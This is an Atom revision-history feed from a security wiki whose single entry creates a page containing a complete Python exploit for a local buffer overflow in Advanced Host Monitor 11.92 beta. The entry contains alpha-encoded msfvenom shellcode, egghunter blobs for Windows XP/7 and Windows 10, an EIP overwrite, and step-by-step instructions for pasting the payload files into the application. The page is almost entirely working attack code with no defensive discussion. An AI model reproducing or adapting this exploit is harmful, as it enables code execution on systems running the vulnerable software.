<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Advanced_Host_Monitor_11.92_beta_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Advanced Host Monitor 11.92 beta 本地緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Advanced_Host_Monitor_11.92_beta_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Advanced_Host_Monitor_11.92_beta_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T20:47:45Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Advanced_Host_Monitor_11.92_beta_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2037&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python  #------------------------------------------------------------------------------------------------------------------------------------# # E...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Advanced_Host_Monitor_11.92_beta_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2037&amp;oldid=prev"/>
		<updated>2021-05-02T05:01:37Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python  #------------------------------------------------------------------------------------------------------------------------------------# # E...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
#------------------------------------------------------------------------------------------------------------------------------------#&lt;br /&gt;
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter)                                                      #&lt;br /&gt;
# Date: 2019-03-18                                                                                                                   #&lt;br /&gt;
# Author: Peyman Forouzan                                                                                                            #&lt;br /&gt;
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit                                   #&lt;br /&gt;
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe                                                                  #&lt;br /&gt;
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe                                                                 #&lt;br /&gt;
# Version: 11.92 beta                                                                                                                #&lt;br /&gt;
# The Program also has SEH Overflow, Which can be implemented in a similar way                                                       #&lt;br /&gt;
# Special Thanks to my wife                                                                                                          #&lt;br /&gt;
# Steps : Open the APP --&amp;gt; Tools --&amp;gt; Trace (or Telnet) --&amp;gt; paste in contents from the egg.txt into &amp;quot;Host&amp;quot; --&amp;gt; Start --&amp;gt; Close        #&lt;br /&gt;
#         Advanced Host Monitor --&amp;gt; Options --&amp;gt; Startup --&amp;gt; paste in contents from the egghunter-winxp-win7.txt or                   #&lt;br /&gt;
#         egghunter-win10.txt (depend on your windows version) into &amp;quot;load specific HTML file&amp;quot; --&amp;gt; Save --&amp;gt; Wait a litle --&amp;gt;          #&lt;br /&gt;
#         Shellcode (Calc) open                                                                                                      #&lt;br /&gt;
#------------------------------------------------------------------------------------------------------------------------------------#&lt;br /&gt;
# &amp;quot;Egg&amp;quot; shellcode into memory --&amp;gt; Egghunter field overflow: EIP overwrite                                                            #&lt;br /&gt;
#------------------------------------------------------------------------------------------------------------------------------------#&lt;br /&gt;
&lt;br /&gt;
#---------------------------------------------------   EGG Shellcode Generation    ---------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg&lt;br /&gt;
egg =  &amp;quot;w00tw00t&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
f = open (&amp;quot;egg.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(egg)&lt;br /&gt;
f.close()&lt;br /&gt;
&lt;br /&gt;
#-----------------------------------------------   EGG Hunter Shellcode Generation    ----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters &lt;br /&gt;
&lt;br /&gt;
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)&lt;br /&gt;
egghunter =  &amp;quot;\x4c\x4c\x4c\x4c\x5f&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x47\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# EggHunter - Modified Version for Windows10 (32-64 bit)&lt;br /&gt;
egghunter10 =  &amp;quot;\x4c\x4c\x4c\x4c\x5f&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6b\x4f\x68\x67\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
eip = &amp;quot;\x4d\x37\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
buffer = egghunter + &amp;quot;\x41&amp;quot; * (268 - len(egghunter)) + eip&lt;br /&gt;
&lt;br /&gt;
f = open (&amp;quot;egghunter-winxp-win7.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(buffer)&lt;br /&gt;
f.close()&lt;br /&gt;
buffer = egghunter10 + &amp;quot;\x41&amp;quot; * (268 - len(egghunter10)) + eip&lt;br /&gt;
f2 = open (&amp;quot;egghunter-win10.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f2.write(buffer)&lt;br /&gt;
f2.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>